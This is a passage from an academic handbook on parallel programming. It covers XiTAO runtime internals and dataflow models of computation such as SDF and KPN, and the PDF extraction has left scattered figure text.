TAOs are specified as derived classes from the base AssemblyTask class. The
AssemblyTask needs to be initialized with a resource width and, optionally, an
address in the software topology, which in the shown example (bottom of Listing 19)
30 Parallel Programming Models 1097
corresponds to a 1D torus topology. TAOs can be created and pushed into the
WSQs both before and after execution starts (via xitao_start()). Dynamic
generation of TAOs is critical to support irregular TAO-DAGs. An example dot
product code in XiTAO and the corresponding DAG are shown, respectively, in
Listing 20 and Fig. 2.
23
24 // Create the TAO-DAG
25 for ( int j = 0 ; j < numvm ; j ++){
26 vm [ j ] = new VecMul (A+ j * b l o c k , B+ j * b l o c k ,
27 C+ j * b l o c k , b l o c k , w i d t h ) ;
28 //Create an edge
29 vm [ j ] − > make_edge ( va ) ;
30 //Push current root to queue
31 x i t a o _ p u s h ( vm [ j ] ) ;
32 }
33
34 //Start the TAO-DAG execution
35 xitao_start ();
36 //Finalize and claim resources back
37 xitao_fini ();
38 }
The initial TAO resource widths (i.e., the number of worker threads to execute the
TAO) can be set explicitly or automatically using the internal performance modeling
which is activated by adding --perfmodel (-p) to the XiTAO configuration
options. XiTAO configuration parameters are described in section “Configuring the
Runtime”.
the XiTAO runtime will attempt to schedule the two tasks on the same set of cores.
This then optimistically results in data reuse via the caches of the cores. XiTAO
currently implements a one-dimensional virtual topologies that is tested in one of
its publicly available benchmarks (Heat).
W =4 W =4
DRAM DRAM
W =2 W =2 W =2 W =2
LLC LLC LLC LLC
W =1 W =1 W =1 W =1 W =1 W =1 W =1 W =1
L1 L1 L1 L1 L1 L1 L1 L1
C0 C1 C4 C5 C2 C3 C6 C7
LR0 LR4
25
75
25
75
25
75
25
75
5
5
06
12
18
25
31
37
43
56
62
68
75
81
87
93
0
0
0.
0.
0.
0.
0.
0.
0.
0.
0.
0.
0.
0.
0.
0.
0.
0.
1.
Relative location
Fig. 3 An example mapping of relative STA location to the elastic resource partitions
1100 M. N. Farooqi et al.
Listing 21 Basic structure of a DAG-based program inserting SPMD code regions (asynchronous
mode)
1 // tao_width: XiTAO specific resource hint
2 // i: the loop counter
3 // loop_start: loop iterator start
4 // loop_end: loop iterator end
5 // scheduling_type: XiTAO scheduler type (e.g. dynamic)
6 // block_length: the chunk size for each task
7
8 auto d a t a p a r a l l e l _ n o d e s =
9 __xitao_async_data_parallel_region
10 ( tao_width , i , l o o p _ s t a r t , loop_end ,
11 scheduling_type , block_length ,
12 for ( int j = 0 ; j < N ; j ++) {
13 C[ i ] [ i ] = 0 ;
14 for ( int k = 0 ; k < N ; k ++)
15 C[ i ] [ j ] += A[ i ] [ k ] * B [ k ] [ j ] ;
16 }
17 );
18 // previous_node the parent node for the data parallel DAG
19 for ( int i = 0 ; i < d a t a p a r a l l e l _ n o d e s . s i z e ( ) ; ++ i ) {
20 p r e v i o u s _ n o d e −>make_edge ( d a t a p a r a l l e l _ n o d e s [ i ] ) ;
21 }
22 // attach the data parallel nodes to the next dependency
23 for ( int i = 0 ; i < d a t a p a r a l l e l _ n o d e s . s i z e ( ) ; ++ i ) {
24 d a t a p a r a l l e l _ n o d e s [ i ] − > make_edge ( n e x t _ n o d e ) ;
25 }
30 Parallel Programming Models 1101
Listing 22 Basic structure of a DAG-based program inserting SPMD code regions (synchronous
mode)
1 _ _ x i t a o _ s y n c _ d a t a _ p a r a l l e l _ r e g i o n ( tao_width , i , l o o p _ s t a r t ,
2 loop_end , s c h e d u l i n g _ t y p e ,
3 block_length ,
4 for ( int j = 0 ; j < N ; j ++) {
5 C[ i ] [ i ] = 0 ;
6 for ( int k = 0 ; k < N ; k ++) C[ i ] [ j ] += A[ i ] [ k ] * B [ k ] [ j ] ;
7 }
8 );
b Sync
a
Fine grain
dependencies
Data-Parallel
Region
Data-Parallel
Region
0 .. 9 10 .. 19 ...
0 .. 9 10 .. 19 ... Chunk size = 10
Chunk size = 10
Fine grain
dependencies
... Sync
Fig. 4 XiTAO data-parallel modes. (a) Asynchronous mode with fine-grained dependencies. (b)
Synchronous mode that is analogous to fork-join models
Table 2 The parameters input by user to the XiTAO’s asynchronous data-parallel interface
Parameter Usage
width The XiTAO resource hint to be given to the loop tasks.
iter The loop index/iterator.
end The loop end.
sched The scheduling options (e.g., static, dynamic, energy-aware, etc.)
block_size Governs the granularity of task creation.
1102 M. N. Farooqi et al.
of previous nodes is synced. Second, the loop is divided into chunks of tasks
according to the block_length parameter. Third, an implicit wait is inserted to
pause the execution until all loop tasks have finished. Listing 22 shows an example
of such usage.
This section describes XiTAO runtime internals that are important for optimizations
and to avoiding synchronization errors. A full description of the moldable task
scheduler and queuing system is described in Pericàs (2018).
XiTAO Internals
An important design consideration in XiTAO is the queuing system and the
implementation of moldability. Figure 5 depicts a high-level view of the queuing
system. XiTAO maintains two queues for each core. TAOs first encounter the work
stealing queues (WSQ). These queues are similar to other work stealing runtimes
such as Cilk. The WSQs are used to balance the load across the cores. Note that
the WSQs are agnostic to moldability, i.e., they manage the TAOs as if they were
simple single-threaded tasks. Only upon selection of a ready TAO does the execution
take moldability into account. To this end, XiTAO implements a second set of
queues for each core, called Assembly Queues (AQ). The AQs are managed in
a strict FIFO policy. Upon selecting a ready TAO, the runtime allocates a set of
AQs corresponding to the subset of cores on which the TAO is to be executed
in a worksharing manner and inserts a reference to the TAO into each of these
1 2 3 4 5 6
cores/threads
30 Parallel Programming Models 1103
queues. To avoid potential deadlock, locks to each AQ are taken before insertion
takes place, in order to make this operation look atomic. The cores then execute
the TAOs by extracting the TAO references from the AQ, one by one, and invoking
its execute() method. More details on XiTAO’s queuing system can be found
in Pericàs (2018).
This design has certain implications when programming TAOs. The first is that
TAOs can only synchronize internally. They should never attempt to synchronize
externally, as this would likely lead to a deadlock. This property makes TAOs look
similar to CUDA thread blocks, or OpenCL work groups. The second implication is
that the cost of inserting ready TAOs is proportional to the number of cores. Hence,
narrow TAOs are preferable when the application is composed of very fine-grained
tasks.
Execution of TAOs from the AQs does not imply a barrier at starting or
finalization of each TAO. Hence, a large degree of asynchrony and overlapping is
possible across different TAOs. However, whether this is beneficial depends very
much on the characteristics of the application and whether the TAOs are compute-
bound, cache-bound, or memory-bound. A XiTAO compile time option can be used
to for barrier synchronization each time a TAO starts/finishes.
Conclusion
This chapter has provided an overview of the current practice for programming
parallel computing systems, with a focus on programming models targeting a
single node. Three models are introduced in detail: OpenMP, OmpSs, and XiTAO.
1104 M. N. Farooqi et al.
Acknowledgments This work has been developed with the support of the Spanish Ministry of
Science and Innovation (Computacion de Altas Prestaciones VIII: PID2019-107255GB). This
work has received funding from the European Union Horizon 2020 research and innovation
program under the LEGaTO project with grant agreement No. 780681 (https://legato-project.eu/).
This work is supported by the European Union’s Horizon 2020 research and innovation program
under the grant agreement No 754304 (DEEP-EST). This work has been done as part of the
European Processor Initiative project. The European Processor Initiative (EPI) (FPA: 800928) has
received funding from the European Union’s Horizon 2020 research and innovation program under
grant agreement EPI-SGA1: 826647
References
Blumofe RD, Joerg CF, Kuszmaul BC, Leiserson CE, Randall KH, Zhou Y (1995) Cilk: an efficient
multithreaded runtime system. In: Proceedings of the fifth ACM SIGPLAN symposium on
principles and practice of parallel programming, PPOPP’95, pp 207–216
Duran A, Perez JM, Ayguadé E, Badia RM, Labarta J (2008) Extending the openmp tasking model
to allow dependent tasks. In: Eigenmann R, de Supinski BR (eds) OpenMP in a new era of
parallelism. Springer, Berlin/Heidelberg, pp 111–122. ISBN 978-3-540-79561-2
Duran A, Ayguadé E, Badia RM, Labarta J, Martinell L, Martorell X, Planas J (2011) OmpSs: a
proposal for programming heterogeneous multi-core architectures. Parallel Process Lett 21(2):
173–193
Karrenberg R (2015) Automatic SIMD vectorization of SSA-based control flow graphs. Springer,
Wiesbaden
Kennedy K, Allen JR (2001) Optimizing compilers for modern architectures: a dependence-based
approach. Morgan Kaufmann Publishers Inc., San Francisco
Kurzak J, Ltaief H, Dongarra J, Badia RM (2010) Scheduling dense linear algebra operations on
multicore processors. Concurr Comput Pract Exp 22(1):15–44. ISSN 1532-0626
Larsen S, Amarasinghe S (2000) Exploiting superword level parallelism with multimedia
instruction sets. In: Proceedings of the ACM SIGPLAN 2000 conference on programming
language design and implementation, PLDI’00. Association for Computing Machinery, New
York, pp 145–156. ISBN 1581131992. https://doi.org/10.1145/349299.349320
Maroñas M (2021) On the design and development of programming models for exascale systems.
PhD thesis, Universitat Politècnica de Catalunya
Maroñas M, Sala K, Mateo S, Ayguadé E, Beltran V (2019) Worksharing tasks: an efficient way to
exploit irregular and fine-grained loop parallelism. In: 2019 IEEE 26th international conference
on high performance computing, data, and analytics (HiPC). IEEE, pp 383–394
Maroñas M, Teruel X, Bull M, Ayguade E, Beltran V (2020) Evaluating worksharing tasks
on distributed environments. In: 2020 IEEE international conference on cluster computing
(CLUSTER). IEEE. Pending publication
Maroñas M, Ayguadé E, Beltran V (2021) Mitigating the NUMA Effect on Task-Based Runtime
Systems. Submitted to the Journal of Supercomputing. ACM
30 Parallel Programming Models 1105
OpenMP Architecture Review Board (1997) OpenMP Fortran Application Programming Interface
1.0. Accessed: 18 Feb 2021
OpenMP Architecture Review Board (1998) OpenMP C and C++ Application Programming
Interface 1.0. Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2005) OpenMP Application Programming Interface 2.5.
Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2008) OpenMP Application Programming Interface 3.0.
Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2013) OpenMP Application Programming Interface 4.0.
Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2020) OpenMP Application Programming Interface 5.1.
https://www.openmp.org/wp-content/uploads/OpenMP-API-Specification-5-1.pdf. Accessed:
18 Feb 2021
Pallares F, Mateo S, Beltran V, Ayguadé E (2019) Master Thesis: extending OmpSs-2 with flexible
task-based array reductions. https://upcommons.upc.edu/handle/2117/129246. Accessed: 01
Mar 2021
Perez JM, Beltran V, Labarta J, Ayguadé E (2017) Improving the integration of task nesting
and dependencies in OpenMP. In: 2017 IEEE international parallel and distributed processing
symposium (IPDPS). IEEE, pp 809–818
Pericàs M (2018) Elastic places: an adaptive resource manager for scalable and portable
performance. ACM Trans Archit Code Optim 15(2). ISSN 1544-3566. https://doi.org/10.
1145/3185458
RISC-V Community (2021) RISC-V vector extension intrinsic document. https://github.com/
riscv/rvv-intrinsic-doc. Accessed: 25 Feb 2021
Soomro PN, Abduljabbar M, Castrillon J, Pericás M (2021) An online guided tuning approach to
run CNN pipelines on edge devices. In: Proceedings of the 18th ACM international conference
on computing frontiers (CF’21), New York. Association for Computing Machinery (ACM)
pp 45–53. ISBN 9781450384049. https://doi.org/10.1145/3457388.3458662
Swamy H (2012) Structured parallel programming patterns for efficient computation by michael
mccool, arch d. robison and james reinders. ACM SIGSOFT Softw Eng Notes 37:43. https://
doi.org/10.1145/2382756.2382773
The XiTAO development team (2021) XiTAO. https://github.com/CHART-Team/xitao.git.
Accessed: 26 Feb 2021
Dataflow Models of Computation for
Programming Heterogeneous Multicores 31
Jeronimo Castrillon, Karol Desnos, Andrés Goens,
and Christian Menard
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1108
About Models of Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1110
Dataflow Models of Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1112
Static Dataflow Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1112
Dynamic Dataflow MoCs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1120
Reconfigurable Dataflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1122
Optimization of Dataflow Programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1125
Modeling Heterogeneous Platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1126
Static Mapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1129
Hybrid Mapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1132
Examples: Models and Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1134
Dataflow in Commercial and Mainstream Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1134
MPSoC Application Programming Studio (MAPS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1134
PREESM and SPIDER . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1137
Conclusion and Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1140
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1140
The work was carried out by Andrés Goens while at the Chair for Compiler Construction,
TU Dresden
Abstract
Keywords
Introduction
(a) (b)
Park
move
backward
move
forward
A State
V=0 V=0
Reverse Drive A Initial
State
Conditional
cond. Transition
V<0 V>0
Fig. 1 Finite-State Machine (FSM) semantics and example. (a) Automatic transmission controller
FSM. (b) FSM semantics
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1111
Listing 1 C implementation
of the FSM from Fig. 1a
Listing 2 VHDL
implementation of the FSM
from Fig. 1a
1112 J. Castrillon et al.
the construction of programs that are executed using one or several underlying
MoCs. For example, programs written in languages like Python or C are originally
intended to be executed on processors, while programs written in the Verilog
language are intended to be synthesized into logic circuits. The C or assembly
languages adopt the imperative MoC, and C++ or Java adopt imperative, object-
oriented, and a bit of functional MoCs. A language can also be used to implement a
MoC not naturally implemented by its syntax, as illustrated in Fig. 1a.
The advantage of using a MoC to specify the behavior of a system is that in
return for abiding by the MoC semantics, key properties of the system can be
specified, guaranteed, and verified by construction. For example, in an FSM, all
possible transitions between states of the system are explicitly specified, and thus
no other transitions are possible. This is particularly useful to prevent unwanted or
harmful behavior when specifying a system, assuming the actual implementation
fully enforces the semantics of the MoC. The transmission controller in Fig. 1a, for
example, does not allow any transition between the Drive and Reverse states,
which would likely damage the controlled system. Guaranteeing such properties
from a system specification with a MoC is generally much simpler than verifying
them on the corresponding implementation with a programming language.
A plethora of MoCs have been created for diverse purposes. Some models, like
FSMs, are great to specify the behavior of control-oriented systems but do not
capture any concurrency and only very limited data processing. Other models, like
lambda calculus (Church 1985), focus on the specification of the computational part
of a system. This chapter focuses on a family of MoCs, namely, dataflow MoCs,
which is largely used for the specification of systems processing streams of data,
such as signals, videos, or images. The properties of the dataflow MoCs, detailed
in next sections, make them particularly suitable for implementation on modern
integrated circuit technologies. For more complete surveys of existing MoCs and
their properties, refer to Lee and Seshia (2016).
punched cards, the main objective of the BLODI language was to make computer
programming accessible to persons with no programming language knowledge. The
BLODI language was composed of a set of 30 primitive blocks, like adders, filters,
and quantizers, that could be used to compose Digital Signal Processing (DSP)
applications. In 1974, Kahn (1974) and Dennis (1974) independently created the
first mathematically grounded MoCs based on graphs, laying the foundation for the
dataflow MoCs family.
A common semantics of all dataflow MoCs is the specification of systems with
directed graphs called dataflow graphs or process networks. A few elements found
in this common dataflow semantics are:
The specification of the internal behavior of actors is not always an integral part
of the MoC semantics. Instead, dataflow MoCs generally specify a set of rules
which govern when actors are allowed to consume and produce a certain number
of tokens (Lee and Messerschmitt 1987).
The popularity of dataflow MoCs for the design of stream processing systems
notably comes from the assets they offer for deriving efficient implementations
on modern hardware and software technologies. Implementing efficient software
on modern hardware requires allocating processing, memory, communication,
and energy resources for each part of the system. By clearly exposing separate
computational entities, data movements, and computation triggers, dataflow MoCs
ease this implementation process. Another key advantage of dataflow MoCs is
their expressiveness for concurrent computations and data movement, which is an
essential feature for both hardware design and parallel software design (Ecker et al.
2009). Finally, dataflow MoCs have been the topic of many research works, and
many analysis and optimization techniques can be found in the literature, some of
which are presented in section “Optimization of Dataflow Programs”.
After this introduction to the basic concepts and advantages of dataflow MoCs,
the following sections present the semantics of a few of the most popular models.
1114 J. Castrillon et al.
(a) x1 (b)
B E
A Actor
A G Port
C
x1 FIFO
D F Delay
xn
Fig. 2 Homogeneous Synchronous Dataflow (HSDF) semantics and example. (a) HSDF graph
example. (b) HSDF graphical semantics
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1115
tokens consumed at this firing. The stateless property of HSDF actors enable the
specification of data parallelism, that is, multiple firings of an actor can be triggered
in parallel if enough data tokens are available on its input FIFOs. Data parallelism
is a powerful feature of the HSDF MoC that enables specifying highly parallel
computations with graphs containing only a few actors. If an HSDF actor must
maintain an internal state containing useful data for future firings, this state must be
explicitly modeled in the graph with a self-loop FIFO (see (F, F ) in Fig. 2a). Such
a self-loop FIFO forces the firings of the enclosed actor to happen sequentially, thus
loosing all potential parallelism for this actor.
The HSDF MoC is particularly useful for designing stream processing appli-
cations running on Multi-Processor Systems-on-Chips (MPSoCs). For example,
deriving an implementation of an HSDF graph on a multicore target with a
shared memory requires solving two resource allocation problems: mapping and
scheduling as well as memory allocation.
(a) (b)
Core1 A B D F G A+1 B+1 Core1 A B D F G B+1 E+1 F+1
Core2 C E C+1 time Core2 C E A+1 C+1 D +1 time
Fig. 3 Schedules of the HSDF from Fig. 2a on two cores. (a) Non-overlapping iterations. (b)
Pipelining iterations
1116 J. Castrillon et al.
read from exactly once, the memory needed for allocating each FIFO corresponds
to the size of one data token transiting through it. This assumption holds only if
HSDF iterations are scheduled one at a time, which means that there are never two
overlapping iterations scheduled concurrently. To save memory resources in shared
memory MPSoCs, an address can be used to store several FIFOs, on the condition
that two FIFOs that store tokens simultaneously may not be allocated in overlapping
memory spaces (Desnos et al. 2015). For example, assuming that all tokens require
exactly one memory slot and that tokens produced and consumed by an actor never
exist simultaneously, the memory allocation presented in Fig. 4 can be derived for
the HSDF graph from Fig. 2a.
The HSDF MoC is similar to the task graphs that can be found in many
programming APIs, like OpenVX, DASK, or StarPU. In a task graph like in
the HSDF MoC, each vertex represents a task to execute, and edges represent
scheduling dependencies between tasks. Often, task graphs are more restrictive
than the HSDF MoC. For example, task graph APIs often require the graph to be
acyclic, model only scheduling dependencies with edges instead of capturing the
data transfers between tasks, or instantiate a task graph for a single execution instead
of several iterations.
The HSDF MoC was originally introduced as a sub-case of the SDF MoC, which
is presented in the next section.
(a) (b)
A 3 1 B 2 3 D A1 Actor
1 x1 2 Port
3 and rate
1 C 4 FIFO
2 2 Delay and
x2 number of
x4 tokens
Fig. 5 Synchronous Dataflow (SDF) example and semantics. (a) SDF graph example. (b) SDF
semantics
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1117
The only difference between the SDF and HSDF MoCs is that SDF actors may
consume and produce more than one data token on each port at each firing. As
illustrated in Fig. 5b, production and consumption rates are specified by an integer
value written next to the ports. As in HSDF, SDF execution is data driven, meaning
that an actor can fire as soon as it has at least as many tokens as specified by its
consumption rates. Hence, it may happen that the number of tokens available on a
FIFO is sufficient to trigger several firings of its consumer actor. An example of such
behavior can be observed in Fig. 5a where actor A produces enough data tokens at
each firing to trigger three firings of actor B.
Depending on the rates, the execution of some SDF graphs may always cause
an indefinite accumulation, or the starvation, of data tokens in one or several
FIFOs of the graph. An indispensable property for any valid system model is to
avoid this inconsistent behavior. The consistency of an SDF graph can be defined
mathematically by building its topology matrix.
The topology matrix associated with the SDF graph of Fig. 5a is presented
hereafter. The columns and rows of the matrix are labeled with the corresponding
actors and FIFOs, respectively.
A B C D
−→ ⎛ ⎞
AB 3 −1 0 0
−→ ⎜1
AC ⎜ 0 −1 0 ⎟
⎟
−→ ⎜0
Γ = CC ⎜ 0 0 0 ⎟
⎟
−→ ⎝0
BD 2 0 −3 ⎠
−→
CD 0 0 4 −2
−→
Note that Γ (CC, C) = 0, since actor C produces and consumes the same number
of tokens on its self-loop. In general, the production and consumption rates on
self-loop FIFOs should always be equal. Otherwise, tokens will either accumulate
indefinitely on this FIFO, or this FIFO will eventually cause a deadlock. In an SDF
1118 J. Castrillon et al.
graph, a deadlock occurs when the number of tokens in the FIFOs of the graph is not
sufficient to enable any actor firing. Thus, an SDF graph G = A, F with topology
matrix Γ is said to be consistent if and only if rank(Γ ) = |A| − 1.
A proof for Theorem 1 can be found in Lee and Messerschmitt (1987). The
consistency of an SDF graph implies the existence of a repetition vector of size |A|.
The integer coefficients of a repetition vector give the minimal number of firings of
each actor to return the graph back to its original state. Executing an iteration of an
SDF graph consists of firing each actor of this graph as many times as given by the
repetition vector.
Computing the repetition vector q of a topology matrix Γ consists of finding a
positive integer vector that solves the following equation:
T
Γ · q = 0 ··· 0
T
The repetition vector for the SDF graph of Fig. 5a is q = 1 3 1 2 .
The expressivity of the SDF MoC is equivalent to that of the HSDF model,
meaning that any system modeled with one of the two MoCs can also be modeled
with the other. This property is often exploited in order to derive an implementation
from an SDF graph first by transforming the SDF graph into an equivalent HSDF
graph (Pino et al. 1996) and then by using this HSDF graph to allocate computing
and memory resources, as seen in section “Homogeneous Synchronous Dataflow
(HSDF)”. For example, Fig. 6 presents an HSDF graph that is equivalent to the SDF
graph from Fig. 5a. This HSDF graph was obtained by duplicating each HSDF actor
by their number of repetitions from the computed repetition vector. The so-called
fork and join actors were introduced to distribute data from a unique producer actor
to several consumers and respectively to gather data from several producer actors to
a unique consumer. To complete the transformation, new data token types must be
used, which combine multiple tokens from the original SDF graph to a single token
in the HSDF graph.
B3 Join D2
C Fork
x2
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1119
The popularity of the SDF MoC comes from its ability to capture task and data
parallelism, but also pipeline parallelism which can be explicitly specified using
delays (Lee and Messerschmitt 1987). The multi-rate capabilities of SDF actors are
also commonly used in signal processing applications for modeling functions with
different input and output sampling rates, such as downsamplers or upsamplers.
Finally, the static analyzability of the SDF MoC, and hence the possibility to map
and schedule it at compile time, is a great asset for developing any systems where
predictability is needed, such as real-time systems. The SDF MoC has been the topic
of many research works, resulting in many analysis and optimization techniques to
optimize their implementation both in hardware and software.
2 blocks: like raster scan, sawtooth scan, Z-order, or even with stencil-like
consumption patterns (Keinert et al. 2005).
The HSDF and SDF MoCs, and all the aforementioned extensions, are static
models. In static models, the consumption and production rates of actors are known
at compile time and are independent of the value of data tokens at runtime. While
this restriction enables powerful analysis and optimizations at compile time, it limits
the expressivity of the models, preventing them from modeling data-dependent
behavior. The dataflow MoCs presented in the next section alleviates this restriction.
The primary difference between static and dynamic dataflow MoCs is that the
number of data tokens consumed and produced by actors is not known a priori
in a dynamic model. Hence, instead fixed or periodic rates, a dynamic actor may
dynamically change its exchange rates. Two of the most popular dynamic dataflow
MoCs, KPN and DPN, are presented in the following.
Interleave Downsample
in0 out in out
in1
KPN Turing complete (Buck 1993), and hence capable of modeling more complex
systems, it also makes the model non-decidable. A dataflow model is said to be
decidable if it is possible to derive a schedule for its computations at compile time.
In the case of KPN, deriving a schedule is infeasible, since the computation and data
exchange may depend on the value of data, which is known only at execution time.
An important characteristic of the KPN MoC is that, like the SDF MoC, it is
a deterministic model. A MoC is said to be deterministic if the behavior of the
controlled system, the history of tokens on every FIFO, and the outputs it produces
solely depend on the inputs given to the system, independently from external factors
such as time or randomness. In the KPN MoC, determinism is enforced by blocking
read operations on FIFOs (Kahn and MacQueen 1976). Once initiated by a process,
a read operation for N tokens will block the process in a waiting state until the
requested tokens become available in the FIFO. The input FIFOs of a process can
only be accessed using blocking reads, and it is not possible to peek at the number
of tokens in a FIFO before reading from it.
Reconfigurable Dataflow
π SDF
The semantics and a graph example of the Parameterized and Interfaced SDF
(π SDF) MoC are presented in Fig. 8. The π SDF semantics combine the semantics
of SDF, the hierarchy mechanism of the IBSDF MoC, and an explicit parameteriza-
tion tree with a reconfiguration mechanism (Desnos et al. 2013).
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1123
(a)
PiSDF semantics
SDF Hierarchy Parameterization Reconfiguration
semantics semantics semantics semantics
Hierarchical Locally static Configuration
A Actor h actor P parameter A actor
Port Data input Parameter Configuration
in
3 and rate interface dependency output port
out Data output Configuration Configurable
FIFO interface input port P parameter
Delay and Configuration
number of input interface
x4 tokens
(b) size
SetN N
Read 1 size Filter size 3 Send
size size size/N Kernel size/N
x2*size size/N size/N
Fig. 8 Parameterized and Interfaced SDF (π SDF). (a) π SDF semantics. (b) π SDF graph example
In the π SDF MoC, each data port of a hierarchical actor is seen as a data
interface to its subgraph. The purpose of an interface-based hierarchy (Piat et al.
2009) is to isolate the nested levels of hierarchy in terms of graph consistency
analysis. In other words, the consistency of a hierarchy of graphs can be verified
by analyzing separately the consistency of each of the underlying SDF graphs. To
enable this compositionality, data interfaces automatically duplicate and discard
data tokens if, during a subgraph iteration, the number of tokens exchanged on
FIFOs connected to interfaces is greater than the number of tokens produced on
the corresponding data ports of the parent actor.
The parameterization semantics of the π SDF MoC consists of a set of param-
eters P and parameter dependencies, configuration input ports, and interfaces. A
parameter p ∈ P is a vertex of the π SDF graph associated with an integer valuation
function val : P → N. The value associated with a parameter is propagated through
explicit dependencies to other parameters and to actors which may use this value
in expressions specifying their own values, or rates of their dataflow ports. In the
π SDF MoC, it is possible to disable all firings of an actor by setting all its rates to
zero. As illustrated in Fig. 8b, parameter values can be propagated through multiple
levels of hierarchy using a configuration input port on a hierarchical actor and a
corresponding configuration input interface in the associated subgraph.
The reconfiguration semantics of the π SDF MoC is based on special con-
figuration actors. When fired, reconfiguration actors are the only actors allowed
1124 J. Castrillon et al.
The previous section discussed different dataflow MoCs and how their properties
make them highly useful to reason about the execution of a program. Tools can
thus leverage the information in the model to optimize a program so as to improve
its performance, energy efficiency, thermal dissipation, reliability or other execution
metrics, or combinations thereof (Marwedel et al. 2011). The functional model of an
application can also be extended to take constraints into account, like buffer sizing
or precedence enforced by the scheduler. Depending on the model, this allows tools
to reason about bounds on metrics while better reflecting the execution on the target
system. This section describes optimization flows for dataflow programs, mostly for
performance and energy efficiency. In particular, it explains different approaches
for mapping, which refers to an automated process that decides where to place the
elements of the model (nodes and edges) onto the target multicore. A mapping is
often thought to account for both a spatial and a temporal placement. A spatial
placement, for instance, specifies which core executes which node or which memory
holds which edge. A temporal placement or scheduling, in turn, specifies in which
order elements that share a resource should be executed.
Most optimization flows rely on models of the target multicore. After introducing
such models, the discussion turns to different model-based mapping approaches that
range from static or compile time to fully dynamic mapping at runtime. The terms
static and dynamic are aligned with the taxonomy in Lee and Ha (1989).
1126 J. Castrillon et al.
System-Level Description
Figure 9 shows a representative set of schematics of heterogeneous multicore SoCs.
The popular 8-core big.LITTLE architecture as found in boards such as the Odroid-
XU3/Odroid-XU4 (https://www.hardkernel.com/shop/odroid-xu4-special-price/) is
depicted in Fig. 9a. The big cores, for instance, a Cortex-A15, and the little cores, for
instance, a Cortex-A7, feature the same instruction set. In this case, heterogeneity
stems from the different performance of the cores as a result of a different
micro-architecture and clock frequency. The more recent DynamIQ technology
from ARM allows integrating heterogeneous micro-architectures in a more flexible
interconnect. Figure 9b shows the schematic of the Texas Instruments (TI) Keystone
II architecture (Biscondi et al. 2012), integrating ARM cores and TI Very Large
Instruction Word (VLIW) cores for digital signal processing. Mesh-based or tiled
architectures can (cf. Fig. 9c) also be found in the market, like the coherent Neoverse
N1 mesh from ARM (Pellegrini et al. 2020) or the Coolidge MPPA 2D torus from
Kalray (de Dinechin 2015). These architectures use Networks-on-Chip (NoCs) as
interconnect. For mapping optimization, tools use a description of topologies such
as those shown in Fig. 9. This is usually implemented with ad hoc markup languages
that describe the interconnect, the types of cores, and the memory subsystem. The
level of detail varies from a pure schematic description, like in Sesame (Pimentel
L2
L1 L1 C6 C7 HW queues
L2 L1 L1 Network proc.
RAM VLIW
Cortex A15
Cortex A7 Cortex A15 C66X DSP L1,L2
Fig. 9 Schematics of heterogeneous multicores. (a) ARM big.LITTLE. (b) TI Keystone II. (c)
ARM CMN-600
31 Dataflow Models of Computation for Programming Heterogeneous Multicores 1127
et al. 2006), the Distributed-Object Layer (DOL) approach (Thiele et al. 2007),
the S-LAM model (Pelcat et al. 2009), or Turnus (Brunet et al. 2013) to a deep
modeling that includes the instructions and micro-architectural details of each of
the cores (Eusse et al. 2013; C/DA Design Automation 2020).
Apart from the pure architectural description, tools for dataflow mapping have to
understand the cost of the runtime environment that enforces the dataflow semantics.
This includes possible communication primitives that can be used to implement
the message-passing FIFO semantics of the high-level model. Some mapping tools
can use these models to automatically select the best matching communication
API in conjunction with the actor mapping (Castrillon et al. 2012). Similarly,
information about multi-tasking or threading support, per-core scheduling policies,
and associated costs are often modeled.
The effort on several such system-level modeling initiatives, including those
of the MCA (The Multicore Association, Inc 2015) and the MPSoC Application
Programming Studio (MAPS) project (Leupers et al. 2017), led to the recent IEEE
2804-2019 Standard for Software-Hardware Interface for Multi-Many-Core (C/DA
Design Automation 2020). The standard defines an XML format to represent
complex architectures, focusing on the information needed to evaluate the execution
of software on them. This includes detailed information of cores (including VLIW),
memory address spaces, caches, scratchpad memories, interconnection links, as well
as communication and synchronization primitives. The more abstract system-level
model used by Mocasin (Menard et al. 2021) is shown in Fig. 10 as example. With
a simple Python syntax, shown on the left side of the figure, the script produces a
model topology that corresponds to the ARM big.LITTLE system of Fig. 9a.
